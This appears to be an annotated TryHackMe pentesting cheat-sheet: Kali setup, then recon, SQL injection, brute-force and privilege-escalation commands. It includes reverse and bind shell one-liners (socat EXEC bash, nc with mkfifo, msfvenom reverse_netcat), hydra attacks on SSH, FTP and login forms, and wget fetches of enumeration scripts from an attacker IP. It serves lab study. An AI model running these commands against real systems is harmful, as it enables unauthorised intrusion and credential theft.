TryHackMe Kali Complete Docker Image
# Pull the rolling Kali image. Every apt/snap command that follows is meant to
# run inside a container started from this image — presumably via
# `docker run -it kalilinux/kali-rolling`, which these notes do not show.
docker pull kalilinux/kali-rolling
apt-get update
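# Password cracking and web scanning tools.
# The comments live on their own lines on purpose: in the original,
# `metasploit-framework \ # ! > 1gb` is an escaped space followed by a
# comment, NOT a line continuation, so apt received a literal " " argument
# and `hashcat` / `nikto` were then run as separate commands instead of
# being installed.
#   metasploit-framework — download is > 1 GB
#   hashcat              — needs a GPU to be useful
#   nikto                — web-server security scanner
apt install -y hydra \
  metasploit-framework \
  hashcat \
  nikto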
# Password cracking: John the Ripper via snap.
# NOTE(review): snap needs a running snapd, which is normally absent inside a
# Docker container — confirm this works here, or use the `john` apt package.
snap install john-the-ripper
# OpenVPN plus the other NetworkManager VPN plugins (PPTP, strongSwan, vpnc),
# installed in a single apt transaction.
apt install -y network-manager-openvpn network-manager-pptp network-manager-strongswan network-manager-vpnc
# Utils
apt install -y vim
# Networking tools. This is a real two-line continuation (no comment after
# the backslash), unlike the first apt block above.
apt install -y inetutils-tools \
iputils-ping
# Utils: NFS mount support and the MySQL/MariaDB command-line client.
apt install -y nfs-common
apt install -y default-mysql-client
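# Wordlists.
# rockyou.txt is fetched from a third-party GitHub release and the download
# is not integrity-checked here: compare its hash against a trusted reference
# before relying on it (no checksum is recorded in these notes).
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# -y added for consistency with every other apt call in this file; without it
# apt stops at an interactive confirmation prompt.
apt install -y seclists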
# Pentest helper scripts (reference links)
https://github.com/JohnHammond/poor-mans-pentest
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
# Hash identification helper, fetched straight from the Kali packaging repo
# on GitLab. The file is downloaded without an integrity check and from a
# moving branch (kali/master); review it or pin a known revision before use.
wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Steps ? — recon outline. IP, P1, P2, P3 are shell variables that must be
# set before any of this runs; `...` on the -p line is a placeholder, not
# valid nmap syntax.
# -A includes OS detection, which nmap only performs with root privileges;
# note that sudo is used inconsistently across the nmap lines below.
nmap -A -sV $IP > nmap_sv.output
nmap -sV -Pn -n -F $IP > nmap_common.output
# masscan over all TCP and UDP ports on the VPN interface (tun0),
# rate-limited to 1000 packets per second.
sudo masscan -e tun0 -p1-65535,U:1-65535 $IP --rate=1000 > masscan_violence.output
# Targeted re-scan of the ports found above.
nmap -sV -Pn -n -p$P1,$P2,$P3,... $IP > nmap_sniper.output
sudo nmap -A -sS -p- $IP > nmap_ss.output
# `## if ...` / `### if ...` below are pseudo-code conditions, not shell;
# bash reads them as comments.
## if 80 in open_ports
# Web content enumeration with two extension sets; the wordlist path is
# user-specific (~/Documents).
gobuster -u http://$IP -w ~/Documents/big_gobuster.txt -x "txt,html,pdf" > gobuster_generic.output
gobuster -u http://$IP -w ~/Documents/big_gobuster.txt -x "php,asp" > gobuster_php.output
nikto -h $IP -Plugins ALL > nikto_plugins.output
# sqlmap pinned to one unpacked snapshot under ~/Tools; output is captured
# in the working directory like the other steps.
python3 ~/Tools/sqlmapproject-sqlmap-9a6acd2/sqlmap.py -u http://$IP --forms -a --dump > sqlmap_generic.output
# => Iterate gobuster on found directories
# => Check source code ?
# => wappalyzer for more info ?
### if apache
nikto -h $IP -Plugins apacheusers > nikto_apache.output
# End
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
Firefox extension Wappalyzer
Firefox extension Burp proxy
# Directory enumeration with php/txt/html extensions. Unlike the gobuster
# calls above, no http:// scheme is given with $IP here.
gobuster -u $IP -w ~/Documents/common.txt -x "php,txt,html"
# List uris with jpg extension — lab-specific hostname and wordlist, kept as
# a worked example rather than a reusable command.
gobuster -u http://jewel.uploadvulns.thm/ -x "jpg" -w ~/Documents/UploadVulnsWordlist.txt
# Hexedit magic number file: inspect/alter the leading bytes of $FILE by hand.
hexedit $FILE
# Reverse shell — the two URLs below are reference cheat-sheets, not
# commands; bash would try to execute them as written.
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
# Local-side listeners: netcat on 1234, socat on 1235.
nc -lnvp 1234
socat TCP-L:1235 -
# Connect-back side. <LOCAL-IP>/<LOCAL-PORT> are placeholders; as written the
# angle brackets are parsed as shell redirections, so substitute them first.
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"
# Stabilize shell
# https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
# Bin shell: nc listens on $PORT and is wired to /bin/sh through a named pipe
# at a fixed /tmp path; the pipe is removed once nc exits.
mkfifo /tmp/f; nc -lvnp $PORT < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
# Socat: same connect-back with a pty and terminal signal handling.
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
# Certificate for openssl socat: self-signed, valid 362 days, private key
# written unencrypted (-nodes); key and cert are concatenated into one PEM.
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
# Nmap
# https://nmap.org/book/port-scanning-options.html
# $SCR is an NSE script name placeholder; 10.10.X.Y is a literal placeholder
# here rather than the $IP variable used elsewhere in this file.
nmap -A -sV --script $SCR -p80 10.10.X.Y
# Extract info from image
binwalk -E firmware.bin #Entropy analysis
# -e carves and extracts embedded files; steghide extracts data hidden in
# the JPEG and prompts for a passphrase when none is given.
binwalk -e img.jpg
steghide extract -sf img.jpg
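# John the ripper
# The wordlist previously pointed at /home/issam/Documents/rockyou.txt, which
# only works for that one user; $HOME/Documents/rockyou.txt matches the
# ~/Documents/rockyou.txt path the hashcat and hydra lines already use.
john-the-ripper.rar2john secure.rar > secure.rar.hash
john-the-ripper --wordlist="$HOME/Documents/rockyou.txt" secure.rar.hash
john-the-ripper.zip2john secure.zip > secure.zip.hash
john-the-ripper --wordlist="$HOME/Documents/rockyou.txt" secure.zip.hash
john-the-ripper --single --format=raw-md5 hash7.txt
# Hash examples here https://hashcat.net/wiki/doku.php?id=example_hashes
# The positional `a` is presumably the hash file — confirm. --force ignores
# hashcat's own warnings, so failures on this line may be masked.
hashcat a -m 0 ~/Documents/rockyou.txt -O --force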
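# Find CVE with nikto
# https://fossies.org/linux/nikto/program/docs/nikto_manual.html#id238272
# Was `-h IP`, a literal string; the other nikto calls in this file pass
# the $IP variable. $PLUGIN names the nikto plugin to run.
nikto -h $IP -Plugins $PLUGIN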
# SQLi — same sqlmap snapshot as the recon section, against a hard-coded lab
# address and page; the recon section's variant uses $IP instead.
python3 ~/Tools/sqlmapproject-sqlmap-9a6acd2/sqlmap.py -u http://10.10.200.158/administrator.php --forms -a --dump
# Samba enumeration. The credentials and 10.10.10.10 are sample values;
# -x runs the given command through the SMB session.
smbmap -u "admin" -p "password" -H 10.10.10.10 -x ipconfig
# SMBCLIENT https://www.samba.org/samba/docs/current/man-html/smbclient.1.html
# Bare smbclient with no arguments only prints its usage.
smbclient
# Out of ideas ? Try impacket (samba, windows, kerberos, tcp)
# https://www.secureauth.com/labs/open-source-tools/impacket/
# Magic number
https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5
# Enumeration & privilege escalation
# enum4linux-ng from the current directory; it reads ${TARGET_IP} while the
# rest of this file uses $IP — set whichever variable the line expects.
./enum4linux-ng.py -A ${TARGET_IP}
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
# Find SUID/SGID executables: regular files with the setuid (4000) or
# setgid (2000) bit, listed with ls -l; permission errors from unreadable
# directories are discarded.
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null
# Kernel exploits ?
# Relative path: this only resolves from the directory that holds the
# kernel-exploits checkout.
kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
# Hydra BRUTEFORCE. The addresses below are lab sample values (the rest of
# the file uses $IP); -t limits parallel tasks and -V prints every attempt.
## SSH
hydra -l root -P ~/Documents/rockyou.txt 192.168.1.105 -t 4 -V ssh
## FTP
hydra -l user -P ~/Documents/rockyou.txt ftp://10.10.116.47
## POST
# <username>/<wordlist> are placeholders; as written bash parses the angle
# brackets as redirections, so substitute real values first.
hydra -l <username> -P <wordlist> 10.10.116.47 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V
# Spawn shell ?
https://gtfobins.github.io/
# Metasploit: start the msf database, then the console.
msfdb start && msfconsole
## 'help' '?' 'search $CMD' 'show' 'info $CMD' 'hosts' 'services' 'analyze' 'vulns' 'use' 'exploit'
## db_nmap -sV 10.10.X.Y
## set RHOSTS $IP , set LHOST , set PAYLOAD
# https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
# Metasploit venom. lhost=10.8.153.55 is a hard-coded local address (the same
# one the wget block further down fetches from); R selects raw output.
msfvenom -p cmd/unix/reverse_netcat lhost=10.8.153.55 lport=4444 R
# Burp
## Send to repeater
## Send to intruder
## Do action > Intercept response
#################### QUICKY
# Serve the current directory over HTTP on port 8000; the wget line below
# fetches from it. NOTE(review): http.server listens on all interfaces by
# default; `--bind <tun0 address>` limits exposure to the VPN link.
python3 -m http.server
# 10.8.153.55 is hard-coded (presumably the local VPN address — it matches
# the msfvenom lhost above). The scripts arrive over plaintext HTTP with no
# integrity check; compare checksums against the local copies before running.
wget http://10.8.153.55:8000/lse.sh http://10.8.153.55:8000/linpeas.sh http://10.8.153.55:8000/LinEnum.sh http://10.8.153.55:8000/les.sh
chmod +x LinEnum.sh linpeas.sh lse.sh les.sh
########################
# Malware analysis
########################
# Static analysis: FLOSS string extraction on the sample. The trailing
# underscore in the filename presumably keeps the sample from being executed
# by accident — confirm that is the intent.
~/Tools/floss malware.exe_